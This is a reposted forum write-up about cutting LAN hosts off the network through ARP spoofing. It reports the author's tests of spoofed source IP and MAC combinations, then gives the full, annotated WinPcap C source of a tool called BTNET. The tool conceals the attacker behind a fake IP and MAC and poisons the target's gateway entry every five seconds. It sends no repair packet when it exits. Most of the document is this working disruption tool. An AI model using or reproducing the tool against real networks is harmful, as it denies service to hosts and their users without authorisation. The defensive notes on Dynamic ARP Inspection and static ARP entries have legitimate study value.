Network attack program based on ARP spoofing (reposted from the Red Guest (Honker) Alliance)


Network attack program based on ARP spoofing

I have recently started learning WinPcap and have read many ARP-spoofing tools written by people far better than me, in particular Too2y's article on writing a multi-function ARP tool on top of the WinPcap driver. Below are a few tests I did while turning that idea into an ARP attack program (one that can cut the target host off the network). Corrections from those who know better are welcome, so that I do not mislead anyone.

The usual ARP spoof sends an ARP reply to the host being deceived, with the source IP set to the address that host wants to reach and the source MAC set to the attacker's own MAC. Suppose there are two machines, A and B. Send A an ARP reply whose source IP is B's address and whose source MAC is my machine's MAC (with IP routing/forwarding enabled on my machine so the data is passed on): from then on everything A sends to B arrives at my machine first. Do the same in the other direction for B, and all traffic between A and B is relayed through my machine until a genuine ARP exchange (or a cache timeout) corrects A's and B's ARP caches.

So what happens if we change the source IP and source MAC of the ARP packet sent to A? Here are my tests.

1. Source IP set to the gateway's IP, source MAC set to a MAC address that does not exist on the LAN.

Almost no effect on the target host.

2. Source IP set to the gateway's IP, source MAC set to the MAC of some other host on the LAN, with IP forwarding left off on that host.

Barely any effect.

3. Source IP set to the gateway's IP, source MAC set to the target host's own MAC.

The target host is cut off from the network immediately!

Evidently, once the crafted ARP reply reaches the target, the target's ARP cache entry for the gateway changes: every frame bound for the gateway is now addressed, at the MAC layer, to the target's own MAC, so the target ends up sending its gateway traffic to itself. Heh.

For the first case, my guess is that because the MAC address does not exist, the target host broadcasts an ARP request and refreshes its own ARP cache.

For the second case, the host that owns the source MAC address returns an ARP reply to the target host, which corrects the poisoned entry.

My knowledge is limited, so these are only guesses; please correct me, thank you.

One more note: the tests above were done only against Windows systems, but the attack has also been tested successfully against Red Hat. (It only works from the target's own layer-2 segment; a switch with Dynamic ARP Inspection, or a host with a static ARP entry for its gateway, is not affected.)

Description of the test program (BTNET.EXE):

USAGE: BTNET -h AttackIP -o GateIP [-m SpoofedMac]

The -m parameter is the source MAC address to put in the spoofed reply; without it the program uses the target's own MAC (case 3 above).

To conceal the attacker, the program sends its ARP requests from the fake identity IP 128.128.128.128 / MAC A5-A5-A5-A5-A5-A5, so it may fail to obtain the target host's MAC address; if so, look the MAC up with a third-party tool. Note also that the program sends nothing to restore the target's ARP cache when it exits: the target stays disconnected until the poisoned entry ages out or a genuine ARP reply from the gateway arrives.

#include "packet32.h"
#include "ntddndis.h"
/* The four bare "#include" lines below lost their targets in extraction and
 * are reconstructed from what the code uses. winsock2.h must come before
 * windows.h, otherwise windows.h pulls in winsock.h and the two clash. */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>
#include <conio.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "packet")

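#define ETH_IP          0x0800  /* EtherType IPv4; also the ARP protocol-type field */
#define ETH_ARP         0x0806  /* EtherType ARP */
#define ARP_REQUEST     0x0001  /* ARP opcode: request */
#define ARP_REPLY       0x0002  /* ARP opcode: reply */
#define ARP_HARDWARE    0x0001  /* ARP hardware type: Ethernet */
#define MAX_NUM_ADAPTER 10      /* capacity of adapterlist[] */

/* On-the-wire layouts. 1-byte packing so that sizeof() equals the frame
 * bytes (14-byte Ethernet header + 28-byte ARP body) and memcpy() of the
 * structs produces a valid frame. */
#pragma pack(push, 1)

typedef struct ethdr {
    unsigned char  eh_dst[6];   /* destination Ethernet address */
    unsigned char  eh_src[6];   /* source Ethernet address */
    unsigned short eh_type;     /* EtherType, network byte order */
} ETHDR, *PETHDR;

typedef struct arphdr {         /* ARP header */
    unsigned short arp_hdr;     /* hardware type */
    unsigned short arp_pro;     /* protocol type */
    unsigned char  arp_hln;     /* hardware address length (6) */
    unsigned char  arp_pln;     /* protocol address length (4) */
    unsigned short arp_opt;     /* opcode: ARP_REQUEST / ARP_REPLY */
    unsigned char  arp_sha[6];  /* sender Ethernet address */
    unsigned long  arp_spa;     /* sender IP address; 4 bytes on Win32 (the only target), not on LP64 */
    unsigned char  arp_tha[6];  /* target Ethernet address */
    unsigned long  arp_tpa;     /* target IP address */
} ARPHDR, *PARPHDR;

typedef struct ip_mac {
    unsigned long ip;           /* host byte order */
    unsigned char mac[6];
} IP_MAC, *PIP_MAC;

/* The original closed with a second "pack(push)", so 1-byte packing was never
 * restored and leaked into everything declared after this point. */
#pragma pack(pop)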

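/* Shared program state. Written by main() and the sniffer thread, read by the
 * sender threads and the timer callback. There is no locking: the only
 * ordering between threads is the Sleep() calls in main(). */
LPADAPTER lpadapter;                        /* adapter opened in main(), used by every thread */
char adapterlist[MAX_NUM_ADAPTER][1024];    /* wide-char adapter names from PacketGetAdapterNames */
IP_MAC toipandmac;                          /* target host: IP (host order) and the MAC learned for it */
IP_MAC oipandmac, myipandmac;               /* gateway and this host */
BOOL param6 = FALSE;                        /* -m given: spoof with a user-supplied source MAC */
char *nomacstr;                             /* raw -m argument */
char nomac[6][3];                           /* -m split into six 2-char hex groups, NUL-terminated */
u_long mytoip, oip;                         /* target IP and gateway IP, host order */
BOOL sendtooip;                             /* FALSE: probe from the fake identity; TRUE: from our real IP/MAC */
MSG msg;                                    /* message loop of the timer thread */
UINT_PTR newtimer;                          /* SetTimer() id; was UINT, which truncates the id on Win64 */
char MYIP[20] = "128.128.128.128";          /* fake source IP used while probing for MACs */
/* Set by the sniffer once each MAC has been learned. */
BOOL toipandmac_flag = FALSE, myipandmac_flag = FALSE, oipandmac_flag = FALSE;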

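/* Parse one hexadecimal digit.
 * Returns its value 0..15, or -1 if c is not a hex digit.
 * As printed, the original tested the lower-case range 'a'..'f' twice and
 * never the upper-case one, so an -m value written like the usage example
 * ("00-50-FC-...") was rejected. */
int GetInt(char c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    if (c >= 'a' && c <= 'f')
        return 10 + (c - 'a');
    if (c >= 'A' && c <= 'F')
        return 10 + (c - 'A');
    return -1;
}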

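/* Print the banner and usage text. Called from main() on bad arguments.
 * The escape sequences in the original listing were flattened to "/ n";
 * they are restored to real newlines here. */
void start(void)
{
    printf("BTNET -- an ARP tool: test whether a Windows host can be cut off the network\n");
    printf("Written by ruder, 10/2003\n");
    printf("Homepage: http://xeyes.cdut.net/ruder/index.htm\n");
    printf("e-mail: cocoruder@163.com\n");
    printf("\nUSAGE: BTNET -h AttackIP -o GateIP [-m SpoofedMac]\n");
    printf("Example:\n");
    printf("BTNET -h 202.115.138.12 -o 202.115.138.1\n");
    printf("BTNET -h 202.115.138.12 -o 202.115.138.1 -m 00-50-FC-6A-6B-7C\n");
    printf("Warning: you must have installed WinPcap 2.3 or WinPcap 3.0 alpha\n");
    printf("Use only against hosts you are authorised to test; the target stays poisoned after exit.\n");
}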

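/* Sniffer thread. Captures ARP replies on lpadapter and records the Ethernet
 * source MAC of any reply whose sender IP is the target, the gateway or this
 * host into toipandmac / oipandmac / myipandmac, setting the matching _flag.
 * Returns once all three MACs are known, on a key press, or on a capture
 * error. The learned MACs are unauthenticated: any host on the segment can
 * answer for any IP, so a competing spoofer could feed this tool bad data.
 *
 * Fixes against the original: a second LPPACKET was allocated and never used
 * or freed; the receive packet was never freed on any exit path; every
 * captured frame was cast to ETHDR+ARPHDR without checking bh_caplen, so a
 * runt frame was read as a full ARP reply. */
DWORD WINAPI SNIFF(LPVOID unused)
{
    LPPACKET lppacketr;
    char recvbuf[1024 * 250];
    ULONG ulbytesreceived, off;
    ETHDR *eth;
    ARPHDR *arp;
    char *buf, *pchar;
    struct bpf_hdr *hdr;
    struct in_addr spa;
    u_long spa_host;
    int i;

    (void)unused;

    if (PacketSetHwFilter(lpadapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE)
        printf("Warning: unable to set the adapter to promiscuous mode\n");

    if (PacketSetBuff(lpadapter, 500 * 1024) == FALSE) {
        printf("PacketSetBuff error: %lu\n", (unsigned long)GetLastError());
        return 0;
    }

    if (PacketSetReadTimeout(lpadapter, 1) == FALSE)
        printf("Warning: unable to set the timeout\n");

    lppacketr = PacketAllocatePacket();
    if (lppacketr == NULL) {
        printf("PacketAllocatePacket receive error: %lu\n", (unsigned long)GetLastError());
        return 0;
    }
    PacketInitPacket(lppacketr, (char *)recvbuf, sizeof(recvbuf));

    while (!kbhit()) {
        if (PacketReceivePacket(lpadapter, lppacketr, TRUE) == FALSE)
            break;

        ulbytesreceived = lppacketr->ulBytesReceived;
        buf = (char *)lppacketr->Buffer;
        off = 0;

        /* The buffer holds a sequence of bpf_hdr-prefixed frames, each padded
         * to a word boundary. */
        while (off + sizeof(struct bpf_hdr) <= ulbytesreceived) {
            if (kbhit())
                goto done;

            hdr = (struct bpf_hdr *)(buf + off);
            pchar = buf + off + hdr->bh_hdrlen;
            off = Packet_WORDALIGN(off + hdr->bh_hdrlen + hdr->bh_caplen);

            /* Do not interpret a truncated capture as a full ARP reply. */
            if (hdr->bh_caplen < sizeof(ETHDR) + sizeof(ARPHDR))
                continue;

            eth = (ETHDR *)pchar;
            arp = (ARPHDR *)(pchar + sizeof(ETHDR));
            if (eth->eh_type != htons(ETH_ARP) || arp->arp_opt != htons(ARP_REPLY))
                continue;

            if (oipandmac_flag && myipandmac_flag && toipandmac_flag)
                goto done;

            spa_host = htonl(arp->arp_spa);   /* wire (network) order -> host order, as the ip fields are stored */
            if (!((toipandmac.ip == spa_host && !toipandmac_flag)
                  || (myipandmac.ip == spa_host && !myipandmac_flag)
                  || (oipandmac.ip == spa_host && !oipandmac_flag)))
                continue;

            spa.s_addr = arp->arp_spa;
            printf("[IP]: %s [MAC]: ", inet_ntoa(spa));
            for (i = 0; i < 5; i++)
                printf("%.2X-", eth->eh_src[i]);
            printf("%.2X\n", eth->eh_src[5]);

            /* As in the original, the MAC is taken from the Ethernet source,
             * not from arp_sha; for a genuine reply the two are equal. */
            if (toipandmac.ip == spa_host) {
                memcpy(toipandmac.mac, eth->eh_src, sizeof(toipandmac.mac));
                toipandmac_flag = TRUE;
            }
            if (oipandmac.ip == spa_host) {
                memcpy(oipandmac.mac, eth->eh_src, sizeof(oipandmac.mac));
                oipandmac_flag = TRUE;
            }
            if (myipandmac.ip == spa_host) {
                memcpy(myipandmac.mac, eth->eh_src, sizeof(myipandmac.mac));
                myipandmac_flag = TRUE;
            }
        }
    }

done:
    PacketFreePacket(lppacketr);
    return 0;
}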

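/* Sender thread: broadcast one ARP request "who-has <ip>" so that the sniffer
 * thread can learn that host's MAC from the reply.
 *
 * dwsendtoip: pointer to a u_long (host order) that lives on main()'s stack;
 *             it is only valid because main() sleeps while this thread runs.
 *
 * While sendtooip is FALSE the request is sent from the fake identity
 * 128.128.128.128 / A5-A5-A5-A5-A5-A5 so the attacker's real address does not
 * show up in the target's ARP table. Once sendtooip is TRUE (the gateway
 * probe in main()) it is sent from our real IP and MAC, which must already
 * have been learned (myipandmac_flag) -- presumably because the gateway will
 * not answer an off-subnet source.
 *
 * Fixes against the original: the LPPACKET was allocated before the "MAC not
 * known" early return and leaked there; PacketFreePacket was called with no
 * argument; arp_spa was reassigned inside the 6-byte copy loop. */
DWORD WINAPI Sendarppacket(LPVOID dwsendtoip)
{
    LPPACKET lppacket;
    ETHDR eth;
    ARPHDR arphdr;
    char szpacketbuf[60];   /* 14 + 28 byte ARP frame, zero-padded to the 60-byte Ethernet minimum */
    u_long sendtoip = *(u_long *)dwsendtoip;

    memset(&eth, 0, sizeof(eth));
    memset(&arphdr, 0, sizeof(arphdr));

    eth.eh_type = htons(ETH_ARP);
    memset(eth.eh_dst, 0xFF, sizeof(eth.eh_dst));       /* broadcast */
    memset(eth.eh_src, 0xA5, sizeof(eth.eh_src));       /* fake identity */
    memset(arphdr.arp_sha, 0xA5, sizeof(arphdr.arp_sha));
    memset(arphdr.arp_tha, 0xFF, sizeof(arphdr.arp_tha)); /* original fills THA with FF; 00 is conventional for a request, replies are unaffected */

    arphdr.arp_hdr = htons(ARP_HARDWARE);
    arphdr.arp_pro = htons(ETH_IP);
    arphdr.arp_opt = htons(ARP_REQUEST);
    arphdr.arp_hln = 6;
    arphdr.arp_pln = 4;
    arphdr.arp_tpa = htonl(sendtoip);
    arphdr.arp_spa = inet_addr(MYIP);   /* inet_addr() already returns network order; htonl(ntohl(x)) == x */

    if (sendtooip) {
        if (!myipandmac_flag) {
            printf("My MAC address can't find!\n");
            return 0;
        }
        memcpy(eth.eh_src, myipandmac.mac, sizeof(eth.eh_src));
        memcpy(arphdr.arp_sha, myipandmac.mac, sizeof(arphdr.arp_sha));
        arphdr.arp_spa = htonl(myipandmac.ip);
    }

    lppacket = PacketAllocatePacket();
    if (lppacket == NULL) {
        printf("\nPacketAllocatePacket error!");
        return 0;
    }

    memset(szpacketbuf, 0, sizeof(szpacketbuf));
    memcpy(szpacketbuf, &eth, sizeof(eth));
    memcpy(szpacketbuf + sizeof(eth), &arphdr, sizeof(arphdr));
    PacketInitPacket(lppacket, szpacketbuf, sizeof(szpacketbuf));

    if (PacketSetNumWrites(lpadapter, 1) == FALSE)
        printf("Warning: unable to send more than one packet in a single write!\n");

    if (PacketSendPacket(lpadapter, lppacket, TRUE) == FALSE)
        printf("Error sending the packets!\n");

    PacketFreePacket(lppacket);
    return 0;
}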

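/* Timer callback, fired every 5 s by the timer installed in Sendsrtimer():
 * sends one poisoning ARP reply to the target.
 *
 * The reply claims that the gateway IP (oip) is at a MAC that is either the
 * target's own MAC (default -- "case 3" of the write-up, which makes the
 * target address its gateway traffic to itself) or the -m value. Both the
 * Ethernet destination and the ARP target are the target's real MAC, so only
 * the target's cache is poisoned, not the whole segment.
 *
 * Signature: the original was "DWORD WINAPI Sendsr()" and was cast to
 * TIMERPROC. SetTimer calls it with four stdcall arguments, so on x86 the
 * callee popped nothing where the caller expected 16 bytes -- it worked only
 * by luck. It now has the real TIMERPROC signature; the cast at the SetTimer
 * call site is harmless either way. Also fixed: the LPPACKET was allocated
 * before the "target MAC unknown" and "-m parse error" returns and leaked
 * there, and PacketFreePacket was called without its argument. */
VOID CALLBACK Sendsr(HWND hwnd, UINT umsg, UINT_PTR idevent, DWORD dwtime)
{
    LPPACKET lppacket;
    ETHDR eth;
    ARPHDR arphdr;
    char szpacketbuf[60];       /* 42-byte ARP frame, zero-padded to the Ethernet minimum */
    unsigned char tomac[6];     /* target's real MAC */
    unsigned char srcmac[6];    /* MAC the gateway IP will be bound to */
    struct in_addr ia;
    int i;

    (void)hwnd; (void)umsg; (void)idevent; (void)dwtime;

    if (!toipandmac_flag) {
        printf("can't get tomac address!\n");
        return;
    }
    memcpy(tomac, toipandmac.mac, sizeof(tomac));

    if (param6) {
        /* -m: six "xx" groups prepared by main(); digits validated here */
        for (i = 0; i < 6; i++) {
            int t1 = GetInt(nomac[i][0]);
            int t2 = GetInt(nomac[i][1]);
            if (t1 == -1 || t2 == -1) {
                printf("-m parameter error!\n");
                return;
            }
            srcmac[i] = (unsigned char)(t1 * 16 + t2);
        }
    } else {
        memcpy(srcmac, tomac, sizeof(srcmac));
    }

    memset(&eth, 0, sizeof(eth));
    memset(&arphdr, 0, sizeof(arphdr));

    memcpy(eth.eh_dst, tomac, sizeof(eth.eh_dst));
    memcpy(eth.eh_src, srcmac, sizeof(eth.eh_src));
    eth.eh_type = htons(ETH_ARP);

    arphdr.arp_hdr = htons(ARP_HARDWARE);
    arphdr.arp_pro = htons(ETH_IP);
    arphdr.arp_opt = htons(ARP_REPLY);
    arphdr.arp_hln = 6;
    arphdr.arp_pln = 4;
    memcpy(arphdr.arp_sha, srcmac, sizeof(arphdr.arp_sha));
    arphdr.arp_spa = htonl(oip);        /* "the gateway is at srcmac" */
    memcpy(arphdr.arp_tha, tomac, sizeof(arphdr.arp_tha));
    arphdr.arp_tpa = htonl(mytoip);

    lppacket = PacketAllocatePacket();
    if (lppacket == NULL) {
        printf("\nError: failed to allocate the LPPACKET structure.\n");
        return;
    }

    memset(szpacketbuf, 0, sizeof(szpacketbuf));
    memcpy(szpacketbuf, &eth, sizeof(eth));
    memcpy(szpacketbuf + sizeof(eth), &arphdr, sizeof(arphdr));
    PacketInitPacket(lppacket, szpacketbuf, sizeof(szpacketbuf));

    if (PacketSetNumWrites(lpadapter, 1) == FALSE)
        printf("Warning: unable to send more than one packet in a single write!\n");

    if (PacketSendPacket(lpadapter, lppacket, TRUE) == FALSE) {
        printf("Error sending the packets!\n");
        PacketFreePacket(lppacket);
        return;
    }
    PacketFreePacket(lppacket);

    /* inet_ntoa() returns a static buffer: keep the two calls in separate printf()s */
    ia.s_addr = arphdr.arp_tpa;
    printf("spoof %s: ", inet_ntoa(ia));
    ia.s_addr = arphdr.arp_spa;
    printf("%s -> ", inet_ntoa(ia));
    for (i = 0; i < 5; i++)
        printf("%.2X-", arphdr.arp_sha[i]);
    printf("%.2X\n", arphdr.arp_sha[5]);
}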

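/* Timer thread: installs a 5-second thread timer whose callback (Sendsr)
 * sends the poisoning reply, then runs the message loop that dispatches it.
 *
 * dwtoip: pointer to the target IP (host order) on main()'s stack; main()
 *         blocks on this thread, so the pointer stays valid.
 *
 * Nothing ever posts WM_QUIT, so the loop runs until the process is killed
 * (Ctrl-C). No corrective ARP reply is sent on the way out: the target stays
 * poisoned until its cache entry ages out or a genuine reply arrives.
 * Fixes: the SetTimer() return value is checked, and GetMessage() is compared
 * with > 0 because it returns -1 on error (the old loop spun on -1). */
DWORD WINAPI Sendsrtimer(LPVOID dwtoip)
{
    printf("Waiting spoof start\n");
    mytoip = *(u_long *)dwtoip;

    /* The cast keeps this line valid whether Sendsr has its original
     * DWORD WINAPI Sendsr() shape or the proper TIMERPROC one. */
    newtimer = SetTimer(NULL, 0, 5 * 1000, (TIMERPROC)Sendsr);
    if (newtimer == 0) {
        printf("SetTimer error: %lu\n", (unsigned long)GetLastError());
        return 0;
    }

    while (GetMessage(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    KillTimer(NULL, newtimer);
    return 0;
}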

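/* Entry point.
 *   BTNET -h AttackIP -o GateIP [-m SpoofedMac]
 * Opens the chosen adapter (needs the NPF driver, i.e. administrator rights),
 * learns the MACs of this host, the target and the gateway by sending ARP
 * requests while the sniffer thread watches for the replies, then hands over
 * to the timer thread that poisons the target every 5 s until Ctrl-C.
 *
 * Fixes against the original:
 *  - the -m walk did memcpy(...,2)/+3 six times with no length check and read
 *    past a short argument;
 *  - the adapter-name parser read *(name1-1) before the buffer on its first
 *    iteration and had no bound on either the adapter count (10) or the
 *    1024-byte name slots;
 *  - scanf()'s result was ignored, so non-numeric input spun forever;
 *  - PacketGetNetInfoEx() was passed sizeof(ipbuff) where the WinPcap API
 *    takes the number of npf_if_addr entries, letting it write past the
 *    single struct on a multi-address adapter;
 *  - the two IP arguments were never validated;
 *  - the else-branch after PacketGetNetInfoEx was missing its closing brace. */
int main(int argc, char *argv[])
{
    HANDLE thread1, thread2, thread3;
    WCHAR adaptername[8192];
    WCHAR *name1;
    ULONG adapterlength;
    DWORD threadid1, threadid2, threadid3;
    u_long toip, myip;
    struct NetType ntype;
    struct sockaddr_in sin;
    struct npf_if_addr ipbuff;
    int adapternum = 0, sel = 0, i;
    LONG npflen;

    if (argc != 5 && argc != 7) {
        start();
        return 0;
    }
    if (strcmp(argv[1], "-h") != 0 || strcmp(argv[3], "-o") != 0) {
        start();
        return 0;
    }
    if (inet_addr(argv[2]) == INADDR_NONE || inet_addr(argv[4]) == INADDR_NONE) {
        printf("Invalid IP address.\n");
        start();
        return 0;
    }
    toip = ntohl(inet_addr(argv[2]));
    oip = ntohl(inet_addr(argv[4]));

    if (argc == 7) {
        /* expected "xx-xx-xx-xx-xx-xx": 17 characters, groups at offsets 0,3,...,15 */
        if (strcmp(argv[5], "-m") != 0 || strlen(argv[6]) < 17) {
            start();
            return 0;
        }
        nomacstr = argv[6];
        for (i = 0; i < 6; i++) {
            memset(nomac[i], 0, sizeof(nomac[i]));
            memcpy(nomac[i], nomacstr + 3 * i, 2);   /* digits are validated by GetInt() when the reply is built */
        }
        param6 = TRUE;
    }

    printf("\nLibrary version: %s", PacketGetVersion());

    adapterlength = sizeof(adaptername);
    if (PacketGetAdapterNames((char *)adaptername, &adapterlength) == FALSE) {
        printf("PacketGetAdapterNames error: %lu\n", (unsigned long)GetLastError());
        return -1;
    }

    /* WinPcap 2.3/3.0 on NT returns a double-NUL-terminated list of wide
     * adapter names (a list of descriptions follows; it is ignored). */
    name1 = adaptername;
    while (*name1 != L'\0') {
        size_t len = wcslen(name1);
        if (adapternum >= MAX_NUM_ADAPTER) {
            printf("Warning: more than %d adapters, the rest are ignored\n", MAX_NUM_ADAPTER);
            break;
        }
        if ((len + 1) * sizeof(WCHAR) > sizeof(adapterlist[0])) {
            printf("Warning: adapter name too long, skipped\n");
        } else {
            memcpy(adapterlist[adapternum], name1, (len + 1) * sizeof(WCHAR));
            adapternum++;
        }
        name1 += len + 1;
    }
    if (adapternum == 0) {
        printf("\nNo adapters found\n");
        return -1;
    }

    printf("\nAdapters installed:\n");
    for (i = 0; i < adapternum; i++)
        wprintf(L"%d-%s\n", i + 1, (WCHAR *)adapterlist[i]);

    for (;;) {
        int ch;
        printf("\nSelect the number of the adapter to open: ");
        if (scanf("%d", &sel) == 1 && sel >= 1 && sel <= adapternum)
            break;
        /* bad or out-of-range input: discard the rest of the line and ask again */
        while ((ch = getchar()) != '\n' && ch != EOF)
            ;
        if (ch == EOF)
            return -1;
    }

    lpadapter = PacketOpenAdapter(adapterlist[sel - 1]);
    if (!lpadapter || lpadapter->hFile == INVALID_HANDLE_VALUE) {
        printf("PacketOpenAdapter error: %lu\n", (unsigned long)GetLastError());
        return -1;
    }

    if (PacketGetNetType(lpadapter, &ntype)) {
        printf("\n\t\t*** host information ***\n");
        printf("[linktype:]\t%u\t\t", (unsigned)ntype.LinkType);
        printf("[linkspeed:]\t%I64u b/s\n", ntype.LinkSpeed);   /* LinkSpeed is 64-bit; %d truncated it */
    }

    npflen = 1;   /* number of npf_if_addr entries in ipbuff, NOT a byte count */
    if (PacketGetNetInfoEx(adapterlist[sel - 1], &ipbuff, &npflen) == FALSE) {
        printf("\nNot get enough data\n");
        PacketCloseAdapter(lpadapter);
        return -1;
    }
    sin = *(struct sockaddr_in *)&ipbuff.Broadcast;
    printf("[broadcast:]\t%.16s\t", inet_ntoa(sin.sin_addr));
    sin = *(struct sockaddr_in *)&ipbuff.SubnetMask;
    printf("[subnetmask:]\t%.16s\n", inet_ntoa(sin.sin_addr));
    sin = *(struct sockaddr_in *)&ipbuff.IPAddress;
    printf("[ipaddress:]\t%.16s\t", inet_ntoa(sin.sin_addr));
    myip = ntohl(sin.sin_addr.s_addr);
    printf("[macaddress:]\n");   /* the MAC itself is printed by the sniffer when it sees our reply */

    oipandmac.ip = oip;
    toipandmac.ip = toip;
    myipandmac.ip = myip;
    sendtooip = FALSE;

    /* Thread ordering is by Sleep() only; the sender threads read the
     * u_long locals below through pointers, so main() must not return
     * while they run. */
    thread1 = CreateThread(NULL, 0, SNIFF, NULL, 0, &threadid1);
    if (thread1 == NULL) {
        printf("CreateThread error: %lu\n", (unsigned long)GetLastError());
        PacketCloseAdapter(lpadapter);
        return -1;
    }
    Sleep(300);                                     /* let the sniffer start before the first probe */

    /* 1. our own MAC, requested from the fake identity */
    thread2 = CreateThread(NULL, 0, Sendarppacket, (LPVOID)&myip, 0, &threadid2);
    Sleep(100);
    CloseHandle(thread2);

    /* 2. the target's MAC, still from the fake identity */
    thread2 = CreateThread(NULL, 0, Sendarppacket, (LPVOID)&toip, 0, &threadid2);
    Sleep(10);
    CloseHandle(thread2);

    /* 3. the gateway's MAC, from our real IP/MAC (needs step 1 to have worked) */
    sendtooip = TRUE;
    Sleep(200);
    thread2 = CreateThread(NULL, 0, Sendarppacket, (LPVOID)&oip, 0, &threadid2);
    Sleep(10);
    CloseHandle(thread2);

    thread3 = CreateThread(NULL, 0, Sendsrtimer, (LPVOID)&toip, 0, &threadid3);
    if (thread3 == NULL) {
        printf("CreateThread error: %lu\n", (unsigned long)GetLastError());
        CloseHandle(thread1);
        PacketCloseAdapter(lpadapter);
        return -1;
    }
    WaitForSingleObject(thread3, INFINITE);         /* never returns normally; Ctrl-C ends the program */

    CloseHandle(thread3);
    CloseHandle(thread1);
    PacketCloseAdapter(lpadapter);
    return 0;
}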

